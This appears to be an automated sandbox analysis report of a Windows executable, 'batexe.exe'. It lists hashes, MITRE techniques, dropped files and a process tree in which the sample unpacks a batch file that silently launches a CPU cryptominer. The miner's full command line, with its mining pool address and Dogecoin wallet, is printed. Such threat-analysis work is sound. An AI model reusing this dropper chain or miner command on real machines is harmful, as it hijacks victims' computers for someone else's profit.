73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
292s
max time network
299s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
22-02-2024 00:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	b2e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	batexe.exe

Executes dropped EXE 2 IoCs

pid	Process
1708	b2e.exe
2476	cpuminer-sse2.exe

Loads dropped DLL 6 IoCs

pid	Process
2476	cpuminer-sse2.exe
2476	cpuminer-sse2.exe
2476	cpuminer-sse2.exe
2476	cpuminer-sse2.exe
2476	cpuminer-sse2.exe
2476	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3896-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3896 wrote to memory of 1708	3896	batexe.exe	79
PID 3896 wrote to memory of 1708	3896	batexe.exe	79
PID 3896 wrote to memory of 1708	3896	batexe.exe	79
PID 1708 wrote to memory of 3752	1708	b2e.exe	80
PID 1708 wrote to memory of 3752	1708	b2e.exe	80
PID 1708 wrote to memory of 3752	1708	b2e.exe	80
PID 3752 wrote to memory of 2476	3752	cmd.exe	83
PID 3752 wrote to memory of 2476	3752	cmd.exe	83

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3896
- C:\Users\Admin\AppData\Local\Temp\658B.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\658B.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\658B.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\76E1.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3752
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2476

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\658B.tmp\b2e.exe

Filesize
9.1MB

MD5
b4bb3dbc7760dc304a726df1c20f54ab

SHA1
a9abc30f928d27fc96b091fd4d187aa26470f0ed

SHA256
bda420d773630c497c99cff9350b782093121029874b4b739091903f0b3e8e06

SHA512
102ae2cfdda1a7d2889dbdbfdc4f41cbc9690660401bb69a7f7a32fa714f15d12991152ee4052d105409712420bb2dddfd8f1594299af958872789f5a57986f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\658B.tmp\b2e.exe

Filesize
506KB

MD5
e0d651977721bd82011d2d2f31ab6801

SHA1
28c611c8d37d9279d513c4a0ce356c9d2205145a

SHA256
57309eced0b0291b4fcc8cc8b04bdddb4d16f00927b5b058a16e0a3849f4ac8f

SHA512
fd5628f63bc70f2f98aaf30d5925a78f7ac43d84745420787ed80ec42bc5a3cc1f28be050bc73d286360c3a1c7fe881afb56840159d52902c810a5327f09d93a

Download Submit
C:\Users\Admin\AppData\Local\Temp\658B.tmp\b2e.exe

Filesize
960KB

MD5
d15ecf39e70d4d6e278b0da9ff36ba87

SHA1
2139694bf96cc3b6fbfadb8a9c8745b8901bff6a

SHA256
04b2e6191d36dccb7b93c7d207ff16c0702cdec9b64b98206f9ffc7dc7633d54

SHA512
326cdd9b35aa3dbd39d2fd4a22dd78f732d481f05ef6dca085cd086d8ca91502f3be961b44e5c4bbf2ebf947ffc4f1b4d4703593951fce22acaa418a77741434

Download Submit
C:\Users\Admin\AppData\Local\Temp\76E1.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
240KB

MD5
26dc70c30f912bac6fcdb0b43b9a50f1

SHA1
1054d4d133d39b65f20ad8c6ca6fcd0a868167b5

SHA256
97570cecf99d7f7b7ce32a9713294a9175eae826265cc4e82078c1d8b8907986

SHA512
de4892110d7c56c463b8d340cd676790c909386582d59b027f2f4a2023c0fff3a2f2cfea54e90c18fae4baedb63de3ea6e7500941eb9695596c5242a15dc19f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
164KB

MD5
e7b49138f1c9aee463ef54f028477e33

SHA1
a704932b8fc0eb2f7cd0fa5be53f0e54c10b9c56

SHA256
0e690cc8fab1f878c2c75e8fcd2004f28cdec63224f60e48dfe4276bd6d39469

SHA512
269bd5dabf7ba6db2eb1762b5c341ffaea03046cdeff9c2fc4a29f5bc3eb6e3bcbf6c72450c90ecfc454082f841fcbcd7959ddbff0f23c4596fd21ed6ee3bf3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
665KB

MD5
646a9977b257f268ceb627b293b5e31f

SHA1
8ba31ad721467ebdb922c00afdbde44d8a0fe6ed

SHA256
7facf0c1cb96760a7ad4131918d588c8eda683cfaabe06c05bf45aeda99fc74e

SHA512
a05bc6864fbdfae237b7689ab0a2dddc822a14f2c1a6c17b39640ef4d3124a979a56bcbcb9a0e512f114f6481a2229b2caa4f92008b4d49d37711d2a7cf52864

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
815KB

MD5
8fb35f73b847b36e3092d115cd061598

SHA1
067bd0dc6507c08a7d8a0464dd6ce0807ed823c7

SHA256
e48e9a30a3933835fdf10544b206d669da7fd687aff0d434eb6e84f3cf09279d

SHA512
d7cbda4f5114a3b9564ee418286124c6f809d7ccd8e2cbdee77bb63cf6ef4a09601cb64ddf4e4858a5ae2bdeee0b686f8e0b2c8886a0bb88c9168f7fd9410ddd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
472KB

MD5
493d1bb97855d432a148e7568d97c699

SHA1
397c69073b7347b0925cc64fb0547879536f92e8

SHA256
3445f9cb5e2d67c29ff3115516e3677ff6bb1850a7e875baca16367a6ed7ace9

SHA512
1876739e47350e47135bde747d34f11ff3d32ee1cea9ab68af4268f2e1bbea7f515a03a74f6747c04805a451729e0632cd75aef393f59ed29529a72d8157cff1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
268KB

MD5
5d73818c44c5b1661796ec0f3e777a95

SHA1
234c311e688ac172fc9832a935813909bd61daa6

SHA256
241288535efe19024c1d57f48e6085974191c9a0dd44af3a8b568c890c3ed12a

SHA512
4379e6b7c6d11f3cbdd5d5241b16670fb5517b223e6fbdaaf3fe0b922b9cfa97bc14c5077e775bfc05f2f1a9aa725e1c8bf30dc90bfc8531deff86baa8922b17

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
61KB

MD5
67768c32fd76afce5e1967afb5185180

SHA1
a536b361a9965f1e298e5a03f0af9e6dab65c42a

SHA256
06e9909c90c952cb4aeed7464c1f0879ac649ccaa116c98d6ba34a10d68b4b7b

SHA512
e5a65035428ac55592252db4daf75276021242ac444ec0676dc4dbcf90906a72f9885779af39dd53be40797f4f31b655fbc8ab5a5dd8f5786d8a2cc7b67f2ab4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
55KB

MD5
6c5ab8dfb88137d26766b8e0896eeaf6

SHA1
c6383daf39f51d3438c4449cbc02fc2d51b67e94

SHA256
cbccbca96ae23e5d5c0520a856cc8aea1711eb697cbb48bc97d05874561578f9

SHA512
9a3e7d99b1e9e5281a5b5dea7b2d81f4b3813587a0788c63d5607a334558ece658fd1d5535055225d9fa7b6a1337ed72914e57a67a801c493408bd1bb5db0ec9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
215KB

MD5
352dbf3e595714fba32b96f02c55713d

SHA1
e388070189ab5c2c97822cec0e2eaf6077647765

SHA256
95d0e82115bfb361274aeb05f15c1ca9c36d933ee91356c4b8f36b82653debce

SHA512
83b1b7c5423fca2fe52a35f5dfb16805c78696c0a0cf2f7caa6bc9c32563684a5ffb42e4a29b304b1e6477f83c454c782745f5cdaf2fc33058e1c92497a39300

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
79KB

MD5
63b4c298dc21bb64d878b401fb291bd8

SHA1
8b8fac890baa8da16ea796749ca121ffabc32c4d

SHA256
c6d51ab66d61646c44d2c6258cea9406e689538a59e69ebb8b831c4ec7f32bf7

SHA512
1dc8805dd27b6ef1a6b0cad12eac44e0e80a102bf1bdcabd04d94633549e76fb0d20c175680462cdebcf4545199c7db2b96133f8d0f61fcf393a6b8059c12a54

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
318KB

MD5
9391d2fe2f21fcb34bb10cf30f08bcf0

SHA1
2d74fd4ea9c8990452c80fe63d1ab99c2cc66c3d

SHA256
609e0b051f0c2a96adfb8349cd67bff04b9921965b8fc55507276bdb4f0b5d61

SHA512
992ca3f76db3cb6030eab2cc027a528d12dc875c0084d677af972650f323b53d928b6f0be3e4a2aba1526924fc1601e77b3447d21c956be1078890a1d57cd766

Download Submit
memory/1708-55-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1708-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2476-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2476-42-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/2476-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/2476-48-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/2476-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2476-49-0x00000000744D0000-0x0000000074568000-memory.dmp

Filesize
608KB

Download
memory/2476-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2476-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2476-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2476-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2476-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2476-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2476-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2476-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3896-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download